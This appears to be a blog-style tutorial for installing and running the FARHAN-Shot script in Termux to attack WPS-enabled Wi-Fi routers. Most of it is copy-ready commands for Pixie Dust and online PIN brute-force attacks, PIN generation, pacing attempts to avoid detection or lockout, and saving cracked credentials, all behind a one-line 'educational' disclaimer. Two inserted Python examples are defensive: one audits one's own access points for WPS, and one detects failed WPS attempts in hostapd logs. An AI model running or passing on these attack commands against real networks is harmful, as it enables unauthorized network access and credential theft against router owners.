Getting into Wi-Fi networks can be important for many reasons, like checking security or connecting when you forget your password. If you have advanced skills and control over your Android device, the Termux app with the FARHAN-Shot script can help you do this.
The FARHAN-Shot script is a useful tool that helps find weaknesses in Wi-Fi networks, especially those that use WPS (Wi-Fi Protected Setup). It can perform different types of attacks, including the Pixie Dust attack, which works well on some routers.
By using the FARHAN-Shot script in Termux, you might be able to access Wi-Fi networks by taking advantage of WPS weaknesses, as long as you have the right permissions and knowledge.
Warning: This guide is intended for educational purposes only. Unauthorized access to networks is illegal and unethical.
Key Features of FARHAN-Shot
FARHAN-Shot is a great tool for testing Wi-Fi security. It works well on Android devices using Termux because it doesn't need to switch to monitor mode. Here are its main features:
Pixie Dust Attack (No Monitor Mode Needed)
The Pixie Dust attack is a fast way to break into WPS-enabled networks by taking advantage of weaknesses in the WPS system. Unlike other methods that need many attempts, Pixie Dust quickly gets the WPS key. Since it doesn't need monitor mode, it's easier to use on Android.
Built-in 3WiFi Offline WPS PIN Generator
FARHAN-Shot has a built-in tool to generate WPS PINs without needing the internet. This tool uses a database of known WPS PINs, making it easier to crack a router's security. This is helpful when:
- The router uses a weak or default WPS PIN.
- You want to try PINs without connecting to the router.
- You have limited internet access.
Online WPS Bruteforce Attack
If the Pixie Dust attack doesn't work, FARHAN-Shot can try different WPS PINs online until it finds the right one. This method is good for:
- Routers that don’t limit PIN attempts.
- Testing specific networks.
- Finding out the default PIN for unknown networks.
Keep in mind, some routers may lock you out after too many failed attempts, so you may need to wait between tries.
Built-in Wi-Fi Scanner
FARHAN-Shot includes a Wi-Fi scanner that shows real-time information about nearby networks. It helps users:
- Find Wi-Fi networks, including those with WPS.
- Highlight networks based on their security status.
- Get important details like signal strength and encryption type.
This scanner makes it easier to find target networks without needing extra tools.
Requirements for FARHAN-Shot
Before installing and using FARHAN-Shot, ensure that your device meets certain requirements.
To run FARHAN-Shot smoothly, your system must have:
- Python 3.6 or above – Required for executing the script.
- WPA Supplicant – Essential for managing wireless connections.
- Pixiewps – A tool specifically designed for performing Pixie Dust attacks.
- iw – A command-line tool for managing wireless devices and scanning networks.
- Root Access – FARHAN-Shot requires root privileges to interact with the network interface.
If your Android device is not rooted, don’t worry—you can still use FARHAN-Shot by installing Kali NetHunter. NetHunter is a mobile penetration testing platform that provides a full Kali Linux environment on Android devices, including tools like Pixiewps and iw. This allows you to run Wi-Fi penetration tests without modifying your device’s system files.
How to Install FARHAN-Shot on Termux
Installing FARHAN-Shot is a straightforward process. You can either use a one-line installation command or manually install the required packages before running the tool.
One-Line Installation (Recommended)
To quickly install FARHAN-Shot and its dependencies, open Termux and run the following command:
apt update && apt upgrade && pkg install tsu && pkg install python && pkg install git && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && git clone --depth 1 https://github.com/gtajisan/FARHAN-Shot FARHAN-Shot && termux-setup-storage && cd FARHAN-Shot
This command will:
- Update and upgrade Termux to ensure you have the latest packages.
- Install dependencies, including Python, Git, and necessary networking tools.
- Clone the FARHAN-Shot repository from GitHub.
- Set up Termux storage for proper functionality.
- Navigate to the FARHAN-Shot directory.
Manual Installation (Step-by-Step)
If you prefer to install everything manually, follow these steps:
Step 1: Install Required Packages
Run the following command to install all necessary dependencies:
pkg update && pkg upgrade && pkg install -y root-repo && pkg install -y git tsu python wpa-supplicant pixiewps iw openssl && termux-setup-storage
Step 2: Clone the FARHAN-Shot Repository
After installing the required packages, download the FARHAN-Shot tool:
git clone --depth 1 https://github.com/Gtajisan/FARHAN-Shot.git
Step 3: Run FARHAN-Shot
Navigate to the FARHAN-Shot directory and execute the script:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0 -K
This will launch the Pixie Dust attack using your wireless interface wlan0. If your device uses a different interface (e.g., wlan1 or eth0), replace wlan0 with the correct interface name. To check your network interface, use the following command in Termux:
iw dev
This will display all available interfaces on your device. Look for the one associated with your WiFi adapter.
How to Update FARHAN-Shot
To keep your tool updated with the latest features and fixes, run:
cd FARHAN-Shot && git pull
This command will pull the latest updates from the official GitHub repository.
With FARHAN-Shot installed and updated, you’re now ready to start Wi-Fi penetration testing.
How to Use FARHAN-Shot for Wi-Fi Penetration Testing
Once you have installed FARHAN-Shot, it's time to use its powerful features for Wi-Fi security testing. This section will guide you through the essential commands and attack methods supported by the tool.
Basic Usage
To run FARHAN-Shot, navigate to the installation directory and execute the script with the required arguments:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0 -K
Here:
- -i wlan0 specifies the wireless interface used for the attack.
- -K initiates the Pixie Dust attack, which exploits vulnerabilities in WPS-enabled routers.
Scanning for Available Wi-Fi Networks
Before targeting a specific access point, you may want to scan nearby Wi-Fi networks:
cd FARHAN-Shot && sudo python FARHAN-Shot.py -i wlan0
This command will list all detectable Wi-Fi networks along with their BSSID (MAC address), signal strength, and WPS status.
Performing a Pixie Dust Attack
The Pixie Dust attack is one of the most effective techniques for exploiting WPS vulnerabilities. To launch this attack on a specific target, use:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K
Replace <BSSID> with the MAC address of the target router.
Using the Integrated 3WiFi Offline WPS PIN Generator
FARHAN-Shot includes an offline WPS PIN generator using the 3WiFi database. This allows you to predict WPS PINs for certain routers without requiring an active connection.
To generate a PIN for a specific network, use:
sudo python FARHAN-Shot.py -i wlan0 --3wifi
This will attempt to retrieve a known WPS PIN for the target access point.
Running an Online WPS Bruteforce Attack
If the Pixie Dust attack fails, you can try an online WPS bruteforce attack, which systematically guesses the WPS PIN:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -B
This method can take longer but may be effective on WPS-enabled routers that do not have proper security measures.
Using the Wi-Fi Scanner with iw
FARHAN-Shot features an integrated Wi-Fi scanner that uses iw for better performance. To scan for networks and highlight WPS-enabled access points, run:
sudo python FARHAN-Shot.py -i wlan0 --scan
This provides a detailed network list with useful information such as encryption type, signal strength, and WPS status.
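The same scan data answers the defender's question of whether your own access points still advertise WPS. The following is an added example, not part of FARHAN-Shot or the original guide: it parses scan text and reports WPS state only for BSSIDs you manage. The sample text is constructed and assumed to follow the layout of `iw dev <iface> scan` output; the BSSIDs, SSIDs and the function name `audit_wps` are hypothetical.

```python
import re

# Constructed sample, modelled on `iw dev wlan0 scan` output (layout assumed).
SAMPLE_SCAN = (
    "BSS aa:bb:cc:00:00:01(on wlan0)\n"
    "\tSSID: office-main\n"
    "\tWPS:\t * Version: 1.0\n"
    "\t\t * Wi-Fi Protected Setup State: 2 (Configured)\n"
    "\t\t * AP setup locked: 0x01\n"
    "BSS aa:bb:cc:00:00:02(on wlan0)\n"
    "\tSSID: office-guest\n"
    "\tWPS:\t * Version: 1.0\n"
    "\t\t * Wi-Fi Protected Setup State: 2 (Configured)\n"
    "BSS aa:bb:cc:00:00:03(on wlan0)\n"
    "\tSSID: lab\n"
    "\tRSN:\t * Version: 1\n"
    "BSS aa:bb:cc:00:00:99(on wlan0)\n"
    "\tSSID: neighbour\n"
    "\tWPS:\t * Version: 1.0\n"
)

BSS_RE = re.compile(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I | re.M)

def audit_wps(scan_text, managed_bssids):
    """Map each managed BSSID to (ssid, status); unmanaged APs are ignored."""
    managed = {b.lower() for b in managed_bssids}
    report = {b: ("", "not-seen") for b in sorted(managed)}
    # split() with one capture group yields [preamble, bssid, body, bssid, body, ...]
    parts = BSS_RE.split(scan_text)
    for bssid, body in zip(parts[1::2], parts[2::2]):
        bssid = bssid.lower()
        if bssid not in managed:
            continue
        fields = [line.strip() for line in body.splitlines()]
        ssid = next((f[5:].strip() for f in fields if f.startswith("SSID:")), "")
        wps = any(f.startswith("WPS:") for f in fields)
        locked = any(f.startswith("* AP setup locked:") and f.endswith("0x01")
                     for f in fields)
        status = "wps-off"
        if wps:
            status = "wps-on-locked" if locked else "wps-on-unlocked"
        report[bssid] = (ssid, status)
    return report
```

Any `wps-on-*` result means the access point still exposes the WPS registrar this guide targets; turning WPS off in the router's configuration removes that surface.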
Advanced Script Options
FARHAN-Shot offers several advanced options to enhance Wi-Fi penetration testing. These options provide more control over attack methods, network scanning, and performance tuning.
Specifying a Custom WPS PIN
If you have a known or suspected WPS PIN for a network, you can manually specify it:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -p <WPS_PIN>
Replace <WPS_PIN> with the actual 8-digit PIN.
Setting a Delay Between PIN Attempts
To reduce the chances of detection or lockout, you can introduce a delay between WPS PIN attempts:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -B -d 5
This command sets a 5-second delay between each PIN attempt.
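Because attempts can be paced like this, a detector on the access point side cannot rely on a failures-per-minute threshold alone. The following is an added example, not part of FARHAN-Shot or the original guide, that flags both rapid and paced runs of failed WPS exchanges in access point logs. The log lines are constructed; `WPS-FAIL` and `WPS-AP-SETUP-LOCKED` are hostapd event names, while the timestamp and `hostapd:` prefix, the thresholds and all function names are assumptions.

```python
import re
from datetime import datetime, timedelta

# hostapd control-event names; the "<ISO time> hostapd: <iface>: " prefix
# is an assumed collector format, not something the guide specifies.
LINE_RE = re.compile(r"^(\S+) hostapd: (\S+): (WPS-FAIL|WPS-AP-SETUP-LOCKED)\b")

def constructed_lines(iface, start, count, gap_s):
    """Build constructed WPS-FAIL log lines spaced gap_s seconds apart."""
    t0 = datetime.fromisoformat(start)
    return [f"{(t0 + timedelta(seconds=i * gap_s)).isoformat()} hostapd: "
            f"{iface}: WPS-FAIL msg=8 config_error=18" for i in range(count)]

SAMPLE_LOG = (
    constructed_lines("wlan0", "2024-05-01T10:00:00", 12, 300)   # paced attempts
    + constructed_lines("wlan1", "2024-05-01T11:00:00", 4, 5)    # rapid attempts
    + ["2024-05-01T11:00:20 hostapd: wlan1: WPS-AP-SETUP-LOCKED"]
    + constructed_lines("wlan2", "2024-05-01T12:00:00", 1, 0)    # one mistyped PIN
)

def wps_alerts(lines, burst=(3, 60), slow=(10, 86400)):
    """Return sorted (iface, rule) alerts; burst/slow are (count, seconds)."""
    fails, alerts = {}, set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, iface, event = datetime.fromisoformat(m.group(1)), m.group(2), m.group(3)
        if event == "WPS-AP-SETUP-LOCKED":
            alerts.add((iface, "ap-locked"))
            continue
        seen = fails.setdefault(iface, [])
        seen.append(ts)
        for rule, (count, secs) in (("burst", burst), ("slow", slow)):
            window = timedelta(seconds=secs)
            if sum(1 for t in seen if ts - t <= window) >= count:
                alerts.add((iface, rule))
    return sorted(alerts)
```

The paced run on wlan0 never trips the 60-second rule and is caught only by the 24-hour count, which is why both windows are evaluated.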
Saving Cracked Credentials
To save successful Wi-Fi credentials for future use, use the -w option:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -w
The credentials will be stored in a file for later reference.
Forcing Pixiewps Bruteforce
If a router does not yield to the standard Pixie Dust attack, you can try forcing Pixiewps to run a full brute-force attack:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -F
Use this option only when necessary, as it may take longer to complete.
Viewing the Exact Pixiewps Command
To see the exact command used by Pixiewps, use:
sudo python FARHAN-Shot.py -i wlan0 -b <BSSID> -K -X
This is useful for debugging and understanding how the attack is executed.
Using a Custom Vulnerability List
If you have a list of known vulnerable devices, you can specify it with:
sudo python FARHAN-Shot.py --vuln-list=my_vulnerable_routers.txt
This helps focus attacks on routers that are more likely to be compromised.
Automatically Disabling the Network Interface After Completion
To ensure the wireless interface resets properly after an attack, use:
sudo python FARHAN-Shot.py -i wlan0 --iface-down
Running the Script in a Loop
For continuous testing or automation, the script can be run in a loop:
sudo python FARHAN-Shot.py -i wlan0 -K -l
This makes the attack repeat until manually stopped.
Reversing the Scan Order
To scan networks in reverse order, use:
sudo python FARHAN-Shot.py -i wlan0 --reverse-scan
Activating MediaTek Wi-Fi Interface Driver
For devices with MediaTek chipsets, enabling the correct Wi-Fi driver can prevent interface issues:
sudo python FARHAN-Shot.py -i wlan0 --mtk-wifi
Enabling Verbose Mode
To get detailed output during the execution, use:
sudo python FARHAN-Shot.py -i wlan0 -v
This provides a real-time log of the attack process.
These advanced options make FARHAN-Shot a highly flexible and powerful tool for Wi-Fi penetration testing. Below is a summary:
Option | Description |
---|---|
-h, --help | Show this help message and exit |
-i INTERFACE, --interface INTERFACE | Name of the interface to use |
-b BSSID, --bssid BSSID | BSSID of the target AP |
-p PIN, --pin PIN | Use the specified pin (arbitrary string or 4/8 digit pin) |
-K, --pixie-dust | Run Pixie Dust attack |
-F, --pixie-force | Run Pixiewps with --force option (bruteforce full range) |
-X, --show-pixie-cmd | Always print Pixiewps command |
-B, --bruteforce | Run online bruteforce attack |
-d DELAY, --delay DELAY | Set the delay between pin attempts |
-w, --write | Write credentials to the file on success |
--iface-down | Down network interface when the work is finished |
--vuln-list VULN_LIST | Use custom file with vulnerable devices list |
-l, --loop | Run in a loop |
-r, --reverse-scan | Reverse order of networks in the list of networks. Useful on small displays |
-v, --verbose | Verbose output |
Troubleshooting Common Issues
Even with proper setup and execution, you might encounter some issues while using FARHAN-Shot. Below are common errors and their solutions to help you resolve problems quickly.
Fixing "RTNETLINK Answers: Operation Not Possible Due to RF-Kill"
Issue:
If you see the error message above, it means the Wi-Fi interface has been soft-blocked, usually by a software switch.
Solution:
Unblock the Wi-Fi interface using the following command:
sudo rfkill unblock wifi
This command will remove the soft block, allowing you to proceed with penetration testing.
Dealing with "Device or Resource Busy (-16)" Error
Issue:
This error occurs when the Wi-Fi interface is still being used by another process, such as Network Manager.
Solution:
- First, disable Wi-Fi in your system settings.
- Then, terminate any conflicting processes.
- If the problem persists, try running the script with the interface down option:
sudo python FARHAN-Shot/FARHAN-Shot.py --iface-down
Handling Disappearing wlan0 Interface on MediaTek Devices
Issue:
On certain Android devices with MediaTek SoCs, disabling Wi-Fi might cause the wlan0 interface to disappear completely.
Solution:
To prevent this from happening, use the MediaTek Wi-Fi interface driver activation command:
sudo python FARHAN-Shot/FARHAN-Shot.py --mtk-wifi
This ensures the wlan0 interface remains active during testing.
These troubleshooting tips should help resolve the most common issues users face when using FARHAN-Shot.
Usage Examples
Starting a Pixie Dust Attack
A Pixie Dust attack exploits vulnerabilities in the WPS (Wi-Fi Protected Setup) protocol to retrieve the WPS PIN and ultimately crack the Wi-Fi password.
Run the following command to initiate a Pixie Dust attack on a specific BSSID:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
Replace 00:90:4C:C1:AC:21 with the actual BSSID of the target network.
Showing Available Networks and Starting a Pixie Dust Attack
If you want to scan for WPS-enabled networks before launching an attack, use this command:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -K
This will display a list of available networks and initiate the Pixie Dust attack on detected vulnerable targets.
Launching an Online WPS Bruteforce Attack
If you know part of the WPS PIN, you can use an online bruteforce attack to guess the remaining digits and gain access:
cd FARHAN-Shot && sudo python3 FARHAN-Shot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
Replace 00:90:4C:C1:AC:21 with the BSSID of the target network and 1234 with the known portion of the WPS PIN.
That's it. If you run into a problem while using FARHAN-Shot, please leave a comment below explaining what happened, and we will help you fix it! Your feedback also helps make the guide better for others.